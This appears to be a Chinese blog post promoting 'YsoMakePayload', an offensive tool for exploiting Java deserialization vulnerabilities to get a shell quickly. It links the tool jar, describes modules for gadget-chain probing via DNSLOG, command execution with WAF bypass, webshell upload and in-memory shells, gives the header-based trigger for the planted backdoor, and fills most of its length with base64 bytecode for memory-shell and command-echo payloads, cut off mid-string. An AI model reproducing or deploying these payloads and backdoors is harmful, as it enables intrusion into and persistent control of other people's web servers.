实战化工具: YsoMakePayload
2022-9-14 12:21:13 Author: 1oecho.github.io(查看原文) 阅读量:73 收藏

0x01 实战需求

  1. 实战中反序列化漏洞利用特点:内存马/命令执行回显
  2. 集成各类内存马和利用链探测,以及各类反序列化漏洞回显
  3. 高效利用,快速getshell
插件下载地址:

http://loecho.oss-cn-beijing.aliyuncs.com/loecho-File/MakeYsoPayload-1.0-SNAPSHOT-jar-with-dependencies.jar

0x02 功能展示

  • 所有功能模块(持续更新)
img

FindClass_DNSLOG 模块(嫖的柯大佬的源码)

  • 通过dnslog探测目标环境存在的各类依赖,我们重点关注的cc链/dbcp/cb等,后续利用内存马/命令回显

    • dnslog_domain: 接受返回值的相应的dnslog
    • make_Type: 序列化数据生成类型: 支持file/base64
    • class_name: 默认为所有class,自定义类型用|连接
CommonsCollections13567 # cc链条
CommonsCollections24    # cc2/cc4
CommonsBeanutils2       # cb2
C3P0
AspectJWeaver
bsh
Groovy
Becl
Jdk7u21
JRE8u20
winlinux

测试环境存在becl/cb18/cc31/cc321等,反序列化利用链

img

AutoCmdExec模块

  • 全平台命令执行,自动适配目标环境,进行命令执行

    • Gadget:支持所有类型Gadget,包括各版本cb链
    • Cmd: 执行的命令
    • Type: 生成的Payload类型,支持base64/file
    • Bypass: WAF绕过以及Paylaod缩小,true为开启绕过,false为关闭绕过
img

UploadFile 模块

  • 文件上传功能,苛刻环境下,内存马写不进去手工写webshell

    • Gadget: 支持所有类型Gadget,包括各版本cb链
    • Src_Path: 源文件路径
    • Dst_Path: 目标网站路径,
    • Bypass: WAF绕过以及Paylaod缩小,true为开启绕过,false为关闭绕过
img

MemFilterShell模块-包含(TomcatServlet/TomcatListener/TomcatFilter/JettyFilter)

  • 嫖的 Y4attaker YSO工具中的内存马

  • 功能说明

    • Gadget: 支持所有类型Gadget,包括各版本cb链
    • InjectType: 注入内存马类型Thread/Jmx
    • Bypass: 是否开启垃圾数据混淆,默认400
img
  • 内存马:
1. 建立连接,添加 Referer: https://www.qaxnb.com/

2. 选择Shell类型:添加Header:x-client-data: rebeyond/cmd/godzilla

3. cmd类型,命令直接通过Header传递即可: cmd:whoami
    • CMD马
img
    • 改版冰蝎3马:
img
  • 回显:
加载对应容器代码即可,未知容器可使用DfsEcho通用回显
img

类加载器: 简单实现原理:

为了使用方便,直接通过Javaas生成对应Class字节码,后续通过Woodpecker-yso 进行加载

img
  • 内存马字节码:
MEM_TOOLS.put("DfSCmdEcho", "yv66vgAAADQA8goAPACECQA7AIUJADsAhgcAhwoABACECQA7AIgJADsAiQgAigoAiwCMCQA7AI0IAI4JADsAjwcAkAoADQCRCgCSAJMKADsAlAoABACVCgAEAJYKADsAlwoAGgCYCgAXAJkIAJoHAJsHAJwKABcAnQcAnggAnwoAoAChCQA7AKIIAGgHAKMHAKQKACAAkQcApQoAIgCRBwCmCgAkAJEIAKcHAKgHAKkKAKoAqwoAqgCsCgCtAK4KACgArwgAsAoAKACxCgAoALIKACcAswoAJwC0CgAnALUKABcAtgoAtwC4CgC3ALkKABcAugoAOwC7BwC8CgAXAL0KAJIAvgcAvwcAwAEAAWgBABNMamF2YS91dGlsL0hhc2hTZXQ7AQAJU2lnbmF0dXJlAQAnTGphdmEvdXRpbC9IYXNoU2V0PExqYXZhL2xhbmcvT2JqZWN0Oz47AQACY2wBABdMamF2YS9sYW5nL0NsYXNzTG9hZGVyOwEAA2hzcgEAEUxqYXZhL2xhbmcvQ2xhc3M7AQADaHNwAQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcgEAEkxqYXZhL2xhbmcvT2JqZWN0OwEAAXABAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAJ0xkb2dlc2VyL3BheWxvYWRzL3RlbXBsYXRlcy9EZlNDbWRFY2hvOwEACGRvY3VtZW50AQAtTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007AQAIaGFuZGxlcnMBAEJbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApFeGNlcHRpb25zBwDBAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGl0ZXJhdG9yAQA1TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjsBAAdoYW5kbGVyAQBBTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAAY8aW5pdD4BAAMoKVYBAAFlAQAiTGphdmEvbGFuZy9DbGFzc05vdEZvdW5kRXhjZXB0aW9uOwEADVN0YWNrTWFwVGFibGUHAL8HAJABAAFpAQAVKExqYXZhL2xhbmcvT2JqZWN0OylaAQADb2JqAQAWKExqYXZhL2xhbmcvT2JqZWN0O0kpVgEAC2dldFJlc3BvbnNlAQAaTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBABVMamF2YS9sYW5nL0V4Y2VwdGlvbjsBACJMamF2YS9sYW5nL0lsbGVnYWxBY2Nlc3NFeGNlcHRpb247AQAtTGphdmEvbGFuZy9yZWZsZWN0L0ludm9jYXRpb25UYXJnZXRFeGNlcHRpb247AQAhTGphdmEvbGFuZy9Ob1N1Y2hNZXRob2RFeGNlcHRpb247AQACcHcBABVMamF2YS9pby9QcmludFdyaXRlcjsBAAFvAQAFZGVwdGgBAAFJBwCjBwCkBwClBwCmAQABRgEAAXEBAA1kZWNsYXJlZEZpZWxkAQAZTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEABXN0YXJ0AQABbgcAmwcAwgcAwwcAngEACDxjbGluaXQ+AQAKU291cmNlRmlsZQEAD0RmU0NtZEVjaG8uamF2YQwAXQBeDABIAEkMAEoASQEAEWphdmEvdXRpbC9IYXNoU2V0DAA9AD4MAEEAQgEAJWphdmF4LnNlcnZsZXQuaHR0cC5IdHRwU2VydmxldFJlcXVlc3QHAMQMAMUAxgwAQwBEAQAmamF2YXguc2VydmxldC5odHRwLkh0dHBTZXJ2bGV0UmVzcG9uc2UMAEUARAEAIGphdmEvbGFuZy9DbGFzc05vdEZvdW5kRXhjZXB0aW9uDADHAF4HAMgMAMkAygwAdwBnDADLAGUMAMwAZQwAZABlDADNAM4MAM8A0AEACWdldEhlYWRlcgEAD2phdmEvbGFuZy9DbGFzcwEAEGphdmEvbGFuZy9TdHJpbmcMANEA0gEAEGphdmEvbGFuZy9PYmplY3QBAAVxYXhuYgcA0wwA1ADVDABGAEcBABNqYXZhL2xhbmcvRXhjZXB0aW9uAQAgamF2YS9sYW5nL0lsbGVnYWxBY2Nlc3NFeGNlcHRpb24BACtqYXZhL2xhbmcvcmVmbGVjdC9JbnZvY2F0aW9uVGFyZ2V0RXhjZXB0aW9uAQAfamF2YS9sYW5nL05vU3VjaE1ldGhvZEV4Y2VwdGlvbgEACWdldFdyaXRlcgEAE2phdmEvaW8vUHJpbnRXcml0ZXIBABFqYXZhL3V0aWwvU2Nhbm5lcgcA1gwA1wDYDADZANoHANsMANwA3QwAXQDeAQACXEEMAN8A4AwA4QDiDADjAOQMAOUAXgwA5gBeDADnAOgHAMMMAOkA6gwA6wDsDADtAO4MAEoAZwEAE1tMamF2YS9sYW5nL09iamVjdDsMAO8AzgwA8ADxAQAlZG9nZXNlci9wYXlsb2Fkcy90ZW1wbGF0ZXMvRGZTQ21kRWNobwEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQBADljb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvVHJhbnNsZXRFeGNlcHRpb24BABpbTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEAF2phdmEvbGFuZy9yZWZsZWN0L0ZpZWxkAQAVamF2YS9sYW5nL0NsYXNzTG9hZGVyAQAJbG9hZENsYXNzAQAlKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL0NsYXNzOwEAD3ByaW50U3RhY2tUcmFjZQEAEGphdmEvbGFuZy9UaHJlYWQBAA1jdXJyZW50VGhyZWFkAQAUKClMamF2YS9sYW5nL1RocmVhZDsBAAhjb250YWlucwEAA2FkZAEACGdldENsYXNzAQATKClMamF2YS9sYW5nL0NsYXNzOwEAEGlzQXNzaWduYWJsZUZyb20BABQoTGphdmEvbGFuZy9DbGFzczspWgEACWdldE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBABhqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2QBAAZpbnZva2UBADkoTGphdmEvbGFuZy9PYmplY3Q7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7AQARamF2YS9sYW5nL1Byb2Nlc3MBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQAMdXNlRGVsaW1pdGVyAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS91dGlsL1NjYW5uZXI7AQAEbmV4dAEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQAHcHJpbnRsbgEAFShMamF2YS9sYW5nL1N0cmluZzspVgEABWZsdXNoAQAFY2xvc2UBABFnZXREZWNsYXJlZEZpZWxkcwEAHCgpW0xqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsBAA1zZXRBY2Nlc3NpYmxlAQAEKFopVgEAA2dldAEAJihMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQAHaXNBcnJheQEAAygpWgEADWdldFN1cGVyY2xhc3MBABVnZXRDb250ZXh0Q2xhc3NMb2FkZXIBABkoKUxqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7ACEAOwA8AAAABwAIAD0APgABAD8AAAACAEAACABBAEIAAAAIAEMARAAAAAgARQBEAAAACABGAEcAAAAIAEgASQAAAAgASgBJAAAABwABAEsATAACAE0AAAA/AAAAAwAAAAGxAAAAAgBOAAAABgABAAAAFABPAAAAIAADAAAAAQBQAFEAAAAAAAEAUgBTAAEAAAABAFQAVQACAFYAAAAEAAEAVwABAEsAWAACAE0AAABJAAAABAAAAAGxAAAAAgBOAAAABgABAAAAFwBPAAAAKgAEAAAAAQBQAFEAAAAAAAEAUgBTAAEAAAABAFkAWgACAAAAAQBbAFwAAwBWAAAABAABAFcAAQBdAF4AAQBNAAAAtgACAAIAAAA8KrcAAQGzAAIBswADuwAEWbcABbMABrIABxIItgAJswAKsgAHEgu2AAmzAAynAAhMK7YADrgADwO4ABCxAAEAFgAsAC8ADQADAE4AAAAuAAsAAAAhAAQAIgAIACMADAAkABYAJgAhACcALAAqAC8AKAAwACkANAAsADsALQBPAAAAFgACADAABABfAGAAAQAAADwAUABRAAAAYQAAABAAAv8ALwABBwBiAAEHAGMEAAoAZABlAAEATQAAAFoAAgABAAAAGirGAA2yAAYqtgARmQAFBKyyAAYqtgASVwOsAAAAAwBOAAAAEgAEAAAAMAAOADEAEAA0ABgANQBPAAAADAABAAAAGgBmAEkAAABhAAAABAACDgEACgBKAGcAAQBNAAACXQAGAAMAAAEUGxA0owAPsgACxgAKsgADxgAEsSq4ABOaAPyyAALHAIayAAoqtgAUtgAVmQB5KrMAArIAChIWBL0AF1kDEhhTtgAZKgS9ABpZAxIbU7YAHMAAGLMAHbIAHccACgGzAAKnACmyAAK2ABQSHgO9ABe2ABlNLLIAAgO9ABq2AByzAAOnAAhNAbMAAqcAMk0stgAhpwAqTSy2ACOnACJNLLYAJacAGrIAA8cAFLIADCq2ABS2ABWZAAcqswADsgACxgBPsgADxgBJsgAMEiYDvQAXtgAZsgADA70AGrYAHMAAJ00suwAoWbgAKbIAHbYAKrYAK7cALBIttgAutgAvtgAwLLYAMSy2ADKnAARNsSobBGC4ABCxAAUAYgCAAIMAHwAxAIgAiwAgADEAiACTACIAMQCIAJsAJADGAQcBCgAfAAMATgAAAI4AIwAAADkAEgA6ABMAPAAaAD0ALQA+ADEAQQBVAEIAWwBDAGIARwByAEgAgABNAIMASQCEAEsAiABVAIsATwCMAFAAkABVAJMAUQCUAFIAmABVAJsAUwCcAFQAoABVAKMAVwC2AFgAugBcAMYAXgDgAF8A/wBgAQMAYQEHAGMBCgBiAQsAZAEMAGcBEwBpAE8AAABSAAgAcgAOAGgAaQACAIQABABfAGoAAgCMAAQAXwBrAAIAlAAEAF8AbAACAJwABABfAG0AAgDgACcAbgBvAAIAAAEUAHAASQAAAAABFABxAHIAAQBhAAAAIwAOEgD7AE5gBwBzBEIHAHRHBwB1RwcAdgcW9wBPBwBzAAAGAAoAdwBnAAEATQAAAVgAAgAMAAAAhCq2ABRNLLYAM04tvjYEAzYFFQUVBKIAZS0VBTI6BhkGBLYANAE6BxkGKrYANToHGQe2ABS2ADaaAAwZBxu4ADenAC8ZB8AAOMAAODoIGQi+NgkDNgoVChUJogAWGQgVCjI6CxkLG7gAN4QKAaf/6acABToIhAUBp/+aLLYAOVlNx/+FsQABACcAbwByAB8AAwBOAAAAQgAQAAAAbAAFAG4AHgBvACQAcAAnAHIALwB0ADoAdQBDAHcAYwB4AGkAdwBvAH4AcgB9AHQAbgB6AIEAewCCAIMAhABPAAAAPgAGAGMABgB4AEkACwAnAE0AcABJAAcAHgBWAHkAegAGAAAAhAB7AEkAAAAAAIQAcQByAAEABQB/AHwARAACAGEAAAAuAAj8AAUHAH3+AAsHAH4BAf0AMQcAfwcAgP4AEQcAOAEB+AAZQgcAc/kAAfgABQAIAIEAXgABAE0AAAAiAAEAAAAAAAq4AA+2ADqzAAexAAAAAQBOAAAABgABAAAAGgABAIIAAAACAIM=");
MEM_TOOLS.put("TomcatServletMemShellFromJMX", "");
MEM_TOOLS.put("TomcatListenerMemShellFromThread", "");
MEM_TOOLS.put("TomcatServletMemShellFromThread", "");
MEM_TOOLS.put("TomcatFilterMemShellFromJMX", "");
MEM_TOOLS.put("TomcatListenerMemShellFromJMX", "");
MEM_TOOLS.put("ResinEchoTemplate", "yv66vgAAADQAxgoAJQBnCgBoAGkKAGgAaggAawoAbABtCABuBwBvCgAHAHAHAHEKAHIAcwoACQB0CgAHAHUIAHYKABcAdwoABwB4CAB5CgAHAHoKAHsAfAoAewB9CAB+BwB/CACABwCBCACCBwCDCgCEAIUKAIQAhgoAhwCICgAZAIkIAIoKABkAiwoAGQCMCgAZAI0IAI4KABUAjwcAkAcAkQcAkgEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAApfcmVzcG9uc2VGAQAZTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEABHRoaXMBAC5MZG9nZXNlci9wYXlsb2Fkcy90ZW1wbGF0ZXMvUmVzaW5FY2hvVGVtcGxhdGU7AQAOY3VycmVudFJlcXVlc3QBABJMamF2YS9sYW5nL09iamVjdDsBAAhyZXNwb25zZQEACmdldFdyaXRlck0BABpMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEABndyaXRlcgEAEExqYXZhL2lvL1dyaXRlcjsBAApnZXRIZWFkZXJNAQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQAHc2Nhbm5lcgEAE0xqYXZhL3V0aWwvU2Nhbm5lcjsBAA1TdGFja01hcFRhYmxlBwCQBwBxBwCTBwCUBwB/BwCBBwCDAQAKRXhjZXB0aW9ucwcAlQcAlgcAlwcAmAcAmQcAmgEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGRvY3VtZW50AQAtTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007AQAIaGFuZGxlcnMBAEJbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsHAJsBAKYoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIaXRlcmF0b3IBADVMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yOwEAB2hhbmRsZXIBAEFMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEAEWdldE9iamVjdEluc3RhbmNlAQBkKExqYXZhL2xhbmcvT2JqZWN0O0xqYXZheC9uYW1pbmcvTmFtZTtMamF2YXgvbmFtaW5nL0NvbnRleHQ7TGphdmEvdXRpbC9IYXNodGFibGU7KUxqYXZhL2xhbmcvT2JqZWN0OwEAA29iagEABG5hbWUBABNMamF2YXgvbmFtaW5nL05hbWU7AQAHbmFtZUN0eAEAFkxqYXZheC9uYW1pbmcvQ29udGV4dDsBAAtlbnZpcm9ubWVudAEAFUxqYXZhL3V0aWwvSGFzaHRhYmxlOwEAFkxvY2FsVmFyaWFibGVUeXBlVGFibGUBABlMamF2YS91dGlsL0hhc2h0YWJsZTwqKj47BwCcAQAJU2lnbmF0dXJlAQBoKExqYXZhL2xhbmcvT2JqZWN0O0xqYXZheC9uYW1pbmcvTmFtZTtMamF2YXgvbmFtaW5nL0NvbnRleHQ7TGphdmEvdXRpbC9IYXNodGFibGU8Kio+OylMamF2YS9sYW5nL09iamVjdDsBAApTb3VyY2VGaWxlAQAWUmVzaW5FY2hvVGVtcGxhdGUuamF2YQwAJwAoBwCdDACeAJ8MAKAAoQEALGNvbS5jYXVjaG8uc2VydmVyLmRpc3BhdGNoLlNlcnZsZXRJbnZvY2F0aW9uBwCiDACjAKQBABFnZXRDb250ZXh0UmVxdWVzdAEAD2phdmEvbGFuZy9DbGFzcwwApQCmAQAQamF2YS9sYW5nL09iamVjdAcAlAwApwCoDACpAKoMAKsArAEAImNvbS5jYXVjaG8uc2VydmVyLmh0dHAuSHR0cFJlcXVlc3QMAK0ArgwArwCqAQAJX3Jlc3BvbnNlDACwALEHAJMMALIAswwAtAC1AQAJZ2V0V3JpdGVyAQAOamF2YS9pby9Xcml0ZXIBAAlnZXRIZWFkZXIBABBqYXZhL2xhbmcvU3RyaW5nAQAQV1dXLUF1dGhlbnRpY2F0ZQEAEWphdmEvdXRpbC9TY2FubmVyBwC2DAC3ALgMALkAugcAuwwAvAC9DAAnAL4BAAJcQQwAvwDADADBAMIMAMMArAEAAAwAxADFAQAsZG9nZXNlci9wYXlsb2Fkcy90ZW1wbGF0ZXMvUmVzaW5FY2hvVGVtcGxhdGUBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQAeamF2YXgvbmFtaW5nL3NwaS9PYmplY3RGYWN0b3J5AQAXamF2YS9sYW5nL3JlZmxlY3QvRmllbGQBABhqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2QBACBqYXZhL2xhbmcvQ2xhc3NOb3RGb3VuZEV4Y2VwdGlvbgEAHmphdmEvbGFuZy9Ob1N1Y2hGaWVsZEV4Y2VwdGlvbgEAK2phdmEvbGFuZy9yZWZsZWN0L0ludm9jYXRpb25UYXJnZXRFeGNlcHRpb24BACBqYXZhL2xhbmcvSWxsZWdhbEFjY2Vzc0V4Y2VwdGlvbgEAH2phdmEvbGFuZy9Ob1N1Y2hNZXRob2RFeGNlcHRpb24BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEGphdmEvbGFuZy9UaHJlYWQBAA1jdXJyZW50VGhyZWFkAQAUKClMamF2YS9sYW5nL1RocmVhZDsBABVnZXRDb250ZXh0Q2xhc3NMb2FkZXIBABkoKUxqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7AQAVamF2YS9sYW5nL0NsYXNzTG9hZGVyAQAJbG9hZENsYXNzAQAlKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL0NsYXNzOwEACWdldE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBAAZpbnZva2UBADkoTGphdmEvbGFuZy9PYmplY3Q7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAAhnZXRDbGFzcwEAEygpTGphdmEvbGFuZy9DbGFzczsBAAdnZXROYW1lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAhjb250YWlucwEAGyhMamF2YS9sYW5nL0NoYXJTZXF1ZW5jZTspWgEADWdldFN1cGVyY2xhc3MBABBnZXREZWNsYXJlZEZpZWxkAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQANc2V0QWNjZXNzaWJsZQEABChaKVYBAANnZXQBACYoTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBABFqYXZhL2xhbmcvUHJvY2VzcwEADmdldElucHV0U3RyZWFtAQAXKClMamF2YS9pby9JbnB1dFN0cmVhbTsBABgoTGphdmEvaW8vSW5wdXRTdHJlYW07KVYBAAx1c2VEZWxpbWl0ZXIBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL3V0aWwvU2Nhbm5lcjsBAAdoYXNOZXh0AQADKClaAQAEbmV4dAEABXdyaXRlAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWACEAJAAlAAEAJgAAAAQAAQAnACgAAgApAAAB9wAGAAkAAADMKrcAAbgAArYAAxIEtgAFEgYDvQAHtgAIAQO9AAm2AApNLLYAC7YADBINtgAOmQATLLYAC7YADxIQtgARTKcADSy2AAsSELYAEUwrBLYAEisstgATTi22AAsSFAO9AAe2AAg6BBkELQO9AAm2AArAABU6BSy2AAsSFgS9AAdZAxIXU7YACDoGGQYsBL0ACVkDEhhTtgAKwAAXOge7ABlZuAAaGQe2ABu2ABy3AB0SHrYAHzoIGQUZCLYAIJkACxkItgAhpwAFEiK2ACOxAAAAAwAqAAAAOgAOAAAAFQAEABcAIQAYADAAGQBAABsASgAdAE8AHgBVAB8AZAAgAHMAIQCHACIAmwAjALQAJADLACUAKwAAAGYACgA9AAMALAAtAAEAAADMAC4ALwAAAEoAggAsAC0AAQAhAKsAMAAxAAIAVQB3ADIAMQADAGQAaAAzADQABABzAFkANQA2AAUAhwBFADcANAAGAJsAMQA4ADkABwC0ABgAOgA7AAgAPAAAAG0ABP8AQAADBwA9AAcAPgAA/wAJAAMHAD0HAD8HAD4AAP8AewAJBwA9BwA/BwA+BwA+BwBABwBBBwBABwBCBwBDAAEHAEH/AAEACQcAPQcAPwcAPgcAPgcAQAcAQQcAQAcAQgcAQwACBwBBBwBCAEQAAAAOAAYARQBGAEcASABJAEoAAQBLAEwAAgApAAAAPwAAAAMAAAABsQAAAAIAKgAAAAYAAQAAACcAKwAAACAAAwAAAAEALgAvAAAAAAABAE0ATgABAAAAAQBPAFAAAgBEAAAABAABAFEAAQBLAFIAAgApAAAASQAAAAQAAAABsQAAAAIAKgAAAAYAAQAAACkAKwAAACoABAAAAAEALgAvAAAAAAABAE0ATgABAAAAAQBTAFQAAgAAAAEAVQBWAAMARAAAAAQAAQBRAAEAVwBYAAMAKQAAAGYAAQAFAAAAAgGwAAAAAwAqAAAABgABAAAALAArAAAANAAFAAAAAgAuAC8AAAAAAAIAWQAxAAEAAAACAFoAWwACAAAAAgBcAF0AAwAAAAIAXgBfAAQAYAAAAAwAAQAAAAIAXgBhAAQARAAAAAQAAQBiAGMAAAACAGQAAQBlAAAAAgBm");
MEM_TOOLS.put("SeeyonFIlterMemShell", "");
MEM_TOOLS.put("TomcatMemshellTemplate2", "");
MEM_TOOLS.put("TomcatMemshellTemplate1", "");
MEM_TOOLS.put("TomcatMemshellTemplate3", "");
MEM_TOOLS.put("TomcatCmdEcho", "yv66vgAAADQBAwoARQCJCgCKAIsKAIoAjAoAHQCNCAB6CgAbAI4KAI8AkAoAjwCRBwB7CgCKAJIIAJMKACAAlAgAlQgAlgcAlwgAmAgAWAcAmQoAGwCaCACbCABsBwCcCwAWAJ0LABYAnggAaAgAnwcAoAoAGwChBwCiCgCjAKQIAKUHAKYIAKcKACAAqAgAqQkAJQCqBwCrCgAlAKwIAK0KAK4ArwoAIACwCACxCACyCACzCAC0CAC1BwC2BwC3CgAwALgKADAAuQoAugC7CgAvALwIAL0KAC8AvgoALwC/CgAgAMAIAMEKABsAwgoAGwDDCADEBwBlCgAbAMUIAMYHAMcIAMgIAMkHAMoHAMsHAMwBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAKkxkb2dlc2VyL3BheWxvYWRzL3RlbXBsYXRlcy9Ub21jYXRDbWRFY2hvOwEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGRvY3VtZW50AQAtTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007AQAIaGFuZGxlcnMBAEJbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApFeGNlcHRpb25zBwDNAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGl0ZXJhdG9yAQA1TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjsBAAdoYW5kbGVyAQBBTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAAg8Y2xpbml0PgEABXZhcjE5AQAgTGphdmEvbGFuZy9Ob1N1Y2hGaWVsZEV4Y2VwdGlvbjsBAAV2YXIxOAEAA2NscwEAEUxqYXZhL2xhbmcvQ2xhc3M7AQAFdmFyMTcBACFMamF2YS9sYW5nL05vU3VjaE1ldGhvZEV4Y2VwdGlvbjsBAARjbWRzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEABnJlc3VsdAEAAltCAQAJcHJvY2Vzc29yAQASTGphdmEvbGFuZy9PYmplY3Q7AQADcmVxAQAEcmVzcAEAAWoBAAFJAQAKcHJvY2Vzc29ycwEAEExqYXZhL3V0aWwvTGlzdDsBAANvYmoBAANzdHIBABJMamF2YS9sYW5nL1N0cmluZzsBAAF0AQASTGphdmEvbGFuZy9UaHJlYWQ7AQABaQEABGZsYWcBAAFaAQAFZ3JvdXABABdMamF2YS9sYW5nL1RocmVhZEdyb3VwOwEAAWYBABlMamF2YS9sYW5nL3JlZmxlY3